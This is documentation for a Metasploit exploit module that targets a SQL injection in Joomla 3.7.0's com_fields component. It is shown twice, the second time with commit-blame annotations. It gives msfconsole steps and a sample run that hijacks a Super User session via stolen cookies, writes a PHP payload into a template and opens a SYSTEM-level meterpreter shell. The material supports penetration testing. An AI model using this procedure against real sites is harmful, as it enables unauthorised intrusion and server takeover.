documentation/modules/exploit/unix/webapp/joomla_comfields_sqli_rce.md

## Vulnerable Application

  This module exploits a SQL Injection vulnerability in the `com_fields` component which was introduced to the core of Joomla in version 3.7.0.
  With the SQLi, it's possible to enumerate cookies of Administrator and Super User users, and hijack one of their sessions. If no Super User is authenticated, the RCE portion will not work. If a session hijack is available, one of the website templates is identified, and our payload is added to the template as a new file, and then executed.

## Verification Steps


  1. Start msfconsole
  2. Do: `use exploit/unix/webapp/joomla_comfields_sqli_rce`
  3. Do: `set rhost [ip]`
  4. Do: `set tageturi [uri]`
  5. Do: `exploit`
  6. Get a shell

## Scenarios

### Joomla 3.7.0 on Windows 7 SP1 with Super User authenticated

```
msf5 exploit(unix/webapp/joomla_comfields_sqli_rce) > run

[*] Started reverse TCP handler on 172.22.222.138:4444
[*] 172.22.222.122:80 - Retrieved table prefix [ unqi0 ]
[*] 172.22.222.122:80 - Retrieved cookie [ ejn9i2c5srk6gchhai4cikdkm3 ]
[*] 172.22.222.122:80 - Retrieved unauthenticated cookie [ 33effe3d96e4c5e749f33b9d639ca36b ]
[+] 172.22.222.122:80 - Successfully authenticated
[*] 172.22.222.122:80 - Creating file [ zM8ZvIAAwxE.php ]
[*] 172.22.222.122:80 - Following redirect to [ /joomlatest/administrator/index.php?option=com_templates&view=template&id=503&file=L3pNOFp2SUFBd3hFLnBocA%3D%3D ]
[*] 172.22.222.122:80 - Token [ df2760a9614efc2566917148ee379c42 ] retrieved
[*] 172.22.222.122:80 - Template path [ /templates/beez3/ ] retrieved
[*] 172.22.222.122:80 - Insert payload into file [ zM8ZvIAAwxE.php ]
[*] 172.22.222.122:80 - Payload data inserted into [ zM8ZvIAAwxE.php ]
[*] 172.22.222.122:80 - Executing payload
[*] Sending stage (37543 bytes) to 172.22.222.122
[+] Deleted zM8ZvIAAwxE.php

meterpreter > getuid
Server username: SYSTEM (0)
meterpreter > sysinfo
Computer    : WIN-V438RLMESAE
OS          : Windows NT WIN-V438RLMESAE 6.1 build 7601 (Windows 7 Professional Edition Service Pack 1) AMD64
Meterpreter : php/windows
meterpreter >
```
Update documentation and module 2018-03-28 10:57:28 -05:00			`## Vulnerable Application`

			This module exploits a SQL Injection vulnerability in the `com_fields` component which was introduced to the core of Joomla in version 3.7.0.
			`With the SQLi, it's possible to enumerate cookies of Administrator and Super User users, and hijack one of their sessions. If no Super User is authenticated, the RCE portion will not work. If a session hijack is available, one of the website templates is identified, and our payload is added to the template as a new file, and then executed.`

verification to verification steps 2020-01-16 10:41:12 -05:00			`## Verification Steps`
Update documentation and module 2018-03-28 10:57:28 -05:00

			`1. Start msfconsole`
			2. Do: `use exploit/unix/webapp/joomla_comfields_sqli_rce`
			3. Do: `set rhost [ip]`
			4. Do: `set tageturi [uri]`
			5. Do: `exploit`
			`6. Get a shell`

			`## Scenarios`

			`### Joomla 3.7.0 on Windows 7 SP1 with Super User authenticated`

			```
			`msf5 exploit(unix/webapp/joomla_comfields_sqli_rce) > run`

			`[*] Started reverse TCP handler on 172.22.222.138:4444`
			`[*] 172.22.222.122:80 - Retrieved table prefix [ unqi0 ]`
			`[*] 172.22.222.122:80 - Retrieved cookie [ ejn9i2c5srk6gchhai4cikdkm3 ]`
			`[*] 172.22.222.122:80 - Retrieved unauthenticated cookie [ 33effe3d96e4c5e749f33b9d639ca36b ]`
			`[+] 172.22.222.122:80 - Successfully authenticated`
			`[*] 172.22.222.122:80 - Creating file [ zM8ZvIAAwxE.php ]`
			`[*] 172.22.222.122:80 - Following redirect to [ /joomlatest/administrator/index.php?option=com_templates&view=template&id=503&file=L3pNOFp2SUFBd3hFLnBocA%3D%3D ]`
			`[*] 172.22.222.122:80 - Token [ df2760a9614efc2566917148ee379c42 ] retrieved`
			`[*] 172.22.222.122:80 - Template path [ /templates/beez3/ ] retrieved`
			`[*] 172.22.222.122:80 - Insert payload into file [ zM8ZvIAAwxE.php ]`
			`[*] 172.22.222.122:80 - Payload data inserted into [ zM8ZvIAAwxE.php ]`
			`[*] 172.22.222.122:80 - Executing payload`
			`[*] Sending stage (37543 bytes) to 172.22.222.122`
			`[+] Deleted zM8ZvIAAwxE.php`

			`meterpreter > getuid`
			`Server username: SYSTEM (0)`
			`meterpreter > sysinfo`
			`Computer : WIN-V438RLMESAE`
			`OS : Windows NT WIN-V438RLMESAE 6.1 build 7601 (Windows 7 Professional Edition Service Pack 1) AMD64`
			`Meterpreter : php/windows`
			`meterpreter >`
			```